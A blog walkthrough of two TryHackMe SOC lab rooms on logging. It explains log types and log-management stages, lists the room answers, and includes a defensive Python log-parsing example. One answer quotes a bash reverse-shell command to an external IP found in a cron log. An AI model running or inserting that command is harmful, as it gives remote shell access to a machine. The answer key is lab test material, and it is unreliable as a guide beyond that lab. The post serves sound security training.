This post introduces logging: why logs are created, what they contain and how they are managed. Logs are generated to track performance, investigate security incidents and establish a baseline against which future events can be judged. They can be system logs, application logs, security logs, audit logs, server logs or database logs. Log management starts with collecting logs, storing them in a central location and parsing them, and ends with analysing them in log analysis tools or a SIEM. This is the TryHackMe Intro to Logs walkthrough, which is part of the TryHackMe SOC Level 2 Track.

This post also covers the answers for TryHackMe Log Operations Room.

Highlights

Log files are records of events committed to a file in a list format. They can include all sorts of information about events that happened at a particular time. Every device on the network creates log files, thus giving you a history of what’s been happening.
A log entry typically carries five fields:

  • Timestamp – the time of the event.
  • Log level – how severe or important the event is.
  • Username – who caused the event.
  • Service or application – what caused the event.
  • Event description – what has happened.

Log file types

  • Event log – records network usage and tracks login attempts, application events and failed password attempts.
  • System log (or syslog) – records operating system events, including startup messages, system changes, shutdowns, errors and warnings.
  • Server log – a text record of the activity of a specific server over a specific period of time.
  • Change log – lists changes made to an application or file.
  • Availability log – tracks uptime, availability and system performance.
  • Authorization and access log – lists who is accessing applications or files.
  • Resource log – provides information on connectivity issues and capacity problems.
  • Application log – messages about a specific application, including status, errors and warnings.
  • Audit log – activities related to operational procedures, crucial for regulatory compliance.
  • Security log – security events such as logins, permission changes and firewall activity.
  • Network log – network traffic, connections and other network-related events.
  • Database log – activity within a database system, such as queries and updates.
  • Web server log – requests processed by a web server, including URLs, response codes and client details.

Room Answers | TryHackMe Intro to Logs

What is the name of your colleague who left a note on your Desktop?

Perry

What is the full path to the suggested log file for initial investigation?

/var/log/gitlab/nginx/access.log

Based on the list of log types in this task, what log type is used by the log file specified in the note from Task 2?

web server log

Based on the list of log formats in this task, what log format is used by the log file specified in the note from Task 2?

combined

After configuring rsyslog for sshd, what username repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing?

stansimon

What is the IP address of SIEM-02 based on the rsyslog configuration file /etc/rsyslog.d/99-websrv-02-cron.conf, which is used to monitor cron messages?

10.10.10.101

Based on the generated logs in /var/log/websrv-02/rsyslog_cron.log, what command is being executed by the root user?

/bin/bash -c "/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1"

Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, how many versions of old compressed log file copies will be kept?

24

Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, what is the log rotation frequency?

hourly

Upon accessing the log viewer URL for unparsed raw log files, what error does /var/log/websrv-02/rsyslog_cron.log show when selecting the different filters?

no date field

What is the process of standardising parsed data into a more easily readable and query-able format?

Normalisation

What is the process of consolidating normalised logs to enhance the analysis of activities related to a specific IP address?

Enrichment
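Parsing, normalisation and the per-IP consolidation that the room calls enrichment, worked through on the combined log format named in the answer for the GitLab nginx access.log above. This is an added example written for this post, not code from TryHackMe, GitLab or nginx. The access.log lines are constructed: the addresses, the gitlab.example.local host name and the ASSETS inventory are hypothetical, and the dotted field names are modelled on Elastic Common Schema names purely as an illustration of a common target schema.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed nginx access.log lines in the combined format:
# ip ident user [time] "request" status bytes "referer" "user-agent"
# Addresses, paths and the gitlab.example.local host name are hypothetical.
SAMPLE_ACCESS_LOG = """\
10.10.10.55 - - [10/Aug/2023:14:07:22 +0000] "GET /users/sign_in HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.10.10.55 - - [10/Aug/2023:14:07:25 +0000] "POST /users/sign_in HTTP/1.1" 200 4123 "http://gitlab.example.local/users/sign_in" "Mozilla/5.0"
10.10.10.55 - - [10/Aug/2023:14:07:26 +0000] "POST /users/sign_in HTTP/1.1" 200 4123 "http://gitlab.example.local/users/sign_in" "python-requests/2.31"
10.10.10.55 - - [10/Aug/2023:14:07:27 +0000] "POST /users/sign_in HTTP/1.1" 302 0 "http://gitlab.example.local/users/sign_in" "python-requests/2.31"
10.10.10.20 - admin [10/Aug/2023:15:09:03 +0100] "GET /admin HTTP/1.1" 200 981 "-" "Mozilla/5.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Hypothetical asset inventory: context the log line itself never carries.
ASSETS = {"10.10.10.20": {"asset": "it-jumphost", "owner": "it-ops"}}


def parse_combined(line):
    """Split one combined-format line into raw string fields; None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def normalise(raw):
    """One schema for every source: ECS-style names, UTC ISO-8601 time, typed numbers."""
    ts = datetime.strptime(raw["time"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
    method, path, _proto = (raw["request"].split(" ") + ["", "", ""])[:3]
    return {
        "@timestamp": ts.isoformat(),
        "source.ip": raw["ip"],
        "user.name": None if raw["user"] == "-" else raw["user"],
        "http.request.method": method,
        "url.path": path,
        "http.response.status_code": int(raw["status"]),
        "http.response.bytes": 0 if raw["bytes"] == "-" else int(raw["bytes"]),
        "http.request.referrer": None if raw["referer"] == "-" else raw["referer"],
        "user_agent.original": raw["agent"],
    }


def enrich(event, assets=ASSETS):
    """Attach address scope and asset ownership looked up outside the log."""
    ip = ipaddress.ip_address(event["source.ip"])
    info = assets.get(event["source.ip"], {"asset": "unknown", "owner": "unknown"})
    return {**event,
            "source.scope": "private" if ip.is_private else "public",
            **{f"host.{k}": v for k, v in info.items()}}


def summarise_by_ip(events):
    """Consolidate normalised events per source IP so one address's activity reads as a whole."""
    out = {}
    for e in events:
        s = out.setdefault(e["source.ip"], {
            "requests": 0, "status_codes": defaultdict(int), "paths": set(),
            "user_agents": set(), "first_seen": e["@timestamp"], "last_seen": e["@timestamp"],
            "asset": e["host.asset"], "scope": e["source.scope"]})
        s["requests"] += 1
        s["status_codes"][e["http.response.status_code"]] += 1
        s["paths"].add(e["url.path"])
        s["user_agents"].add(e["user_agent.original"])
        s["first_seen"] = min(s["first_seen"], e["@timestamp"])
        s["last_seen"] = max(s["last_seen"], e["@timestamp"])
    return out


def pipeline(text, assets=ASSETS):
    """Parse, normalise, enrich and consolidate a whole access.log in one pass."""
    raws = (parse_combined(line) for line in text.splitlines())
    return summarise_by_ip(enrich(normalise(r), assets) for r in raws if r)


if __name__ == "__main__":
    for ip, summary in pipeline(SAMPLE_ACCESS_LOG).items():
        print(ip, dict(summary["status_codes"]), sorted(summary["user_agents"]))
```

The +0100 entry lands one hour earlier in the summary than its raw text suggests, which is why timestamps are converted before anything is compared or counted. The consolidation step is what exposes the pattern: one source hitting the same path with two different user agents in a few seconds, with no asset record behind it.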

Room Answers | TryHackMe Log Operations

Which of the given log purposes would be suitable to measure the cost of using a service?

Operational

Which of the given log purposes would be suitable for investigating application logs for enhancement and stability? 

Debug

You are a consultant working for a growing startup. As a consultant, you participated in a log configuration planning session. The company you work for is working toward compliance so that it can process payment information. The given question set is being discussed.

Which question’s answer can be “as much as mentioned in the PCI DSS requirements.”?

How much do you need to log

The session continues, and your teammates need your help; they will negotiate for logging budget and operation details. As a consultant, you must remind them of a vital point:

Which requirements are non-negotiable?

operational and security requirements

Your team is working on policies to decide which logs will be stored and which portion will be available for analysis.
Which of the given logging principles would be implemented and improved?

Archiving and Accessibility

Your team implemented a brand new API logging product. One of the team members has been tasked with collecting the logs generated by that new product. The team member reported continuous errors when transferring the logs to the review platform.
In this case, which of the given difficulties occurs?

Process and Archive

As a consultant, you are doing a comprehensive risk assessment and noticed that one of the development teams implemented a custom script to generate logs for an old system, which omits logging at some phases.

What would you call this? (Mistake or Practice?)

Mistake

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
